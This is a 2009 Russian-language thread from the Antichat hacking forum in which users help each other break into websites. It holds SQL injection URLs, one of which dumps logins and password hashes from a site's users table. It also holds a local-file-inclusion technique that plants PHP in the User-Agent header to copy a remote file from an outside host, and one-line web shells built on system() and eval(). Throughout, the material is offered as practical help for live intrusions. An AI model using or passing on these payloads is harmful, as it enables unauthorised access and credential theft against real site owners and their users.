Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.07.2009, 19:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Вопрос:
Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.
Как же это замутить ))
|
|
|
29.07.2009, 19:57
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Сообщение от Велемир
Вопрос:
Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.
Как же это замутить ))
Уязвимости php 5.2 ?? 
http://www.xakep.ru/vulnerability/PHP/
|
|
|
|
29.07.2009, 20:09
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Велемир
Вопрос:
Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.
Как же это замутить ))
http://milw0rm.com/exploits/7646
|
|
|
|
29.07.2009, 20:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Код:
function affiliates_banners_edit_verify()
{
global $txt, $smcFunc, $sourcedir, $board_info, $board, $selected_boards;
// Check Permission for Admin and Affiliates Manager
if (!allowedTo('affiliates_manage'))
fatal_lang_error('affiliates_no_permission', false);
// We need an ID!!
if (empty($_REQUEST['id']))
fatal_lang_error('banners_no_selected', false);
// Check the banner
$bannerimage = htmlspecialchars($_REQUEST['bannerimage'], ENT_QUOTES);
$banner_id = $_REQUEST['id'];
if (empty($bannerimage))
fatal_lang_error('banner_no_image',false);
$smcFunc['db_query']('', "
UPDATE {db_prefix}affiliates_banners
SET image = '$bannerimage'
WHERE id_banner = $banner_id LIMIT 1");
// Please redirectme to the new banner
redirectexit('action=affiliates;sa=banners');
}
people,тут же есть вроде инъект,и как мне его с UPDATE реализовать?
P.S. просто уже мозг кипит
Последний раз редактировалось HAXTA4OK; 29.07.2009 в 20:26..
|
|
|
|
29.07.2009, 20:54
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
script.php?bannerimage=asd&id=1 and 1=(if(1=1,1,(select 1 union select 2)))
мож так, не проверял да и от многих факторов зависит
__________________
Карфаген должен быть разрушен...
|
|
|
|
29.07.2009, 21:43
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
jokester
1) Выполнял запросы через /proc/self/environ. PHP код писал в User-Agent.
2) allow_url_fopen = 1
allow_url_include = в phpinfo его вообще нету
magic_quotes_gpc = 1
safe mode = 0
disable_functions = no value
3) ls -la пашет, проверил /tmp - все норм.
4) <? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
когла понял, что стоит мк, пробывал так:
<?php copy(base64_decode(blabla)); ?>
-----------------------------------------------------------
Мне Grey уже помог с шеллом, но нихуя не объяснил. Он залил как-то вручную через пакету, но не суть...
jokester, был бы рад услышать твой совет... )
P.S.
Я знаю, что в чем-то не прав =\
|
|
|
|
29.07.2009, 22:02
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
в User-Agent пропиши
<? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
magic_quotes_gpc действует только на gpc те. на _REQUEST а на User-Agent не распространяется
__________________
Карфаген должен быть разрушен...
|
|
|
|
29.07.2009, 22:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Tigger
Если allow_url_include в phpinfo нет, то версия пыха, как я понимаю четвёртая. Тут будет работать и инклуд удалённый скорее всего, ну а copy() уж 100%.
Проблема только в кавычках. А вариантов масса. Я-же не зря спрашивал какой код ты пишешь. Именно КОД.
Одно дело если это например <? system($_GET[cmd]); ?> совсем другое если <?php eval($_REQUEST[ev]); ?> или например <?php include($_REQUEST[c]); ?> Туда ведь можно записать много чего, подумай, я думаю запросто найдёшь ещё парочку.
Я просто предполагаю, что Грей не просто так не объяснил, он любит по этой тематике задачки давать, поэтому фишек палить не буду, хотя они все в паблике, найдёшь без проблем
|
|
|
|
29.07.2009, 22:15
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
такое дело :
вывожу записи лимитом,движок сайта сабдример.
Код:
http://сайт.ру/catalog/index.php?category=-2+union+select+1,concat(0x3a,login,pass),3,4,5,6,7+from+pmd_users+limit+1,0--
вылазит такое :
login1821165f4dcc3b5aa765d61d8327deb882cf99
меняется при изминении значения лимита только эта часть:
login 1821165f4dcc3b5aa765d61d8327deb882cf99
вобщем что посоветуете? |
|
|
|
29.07.2009, 22:19
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
после зелёного идёт MD5
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
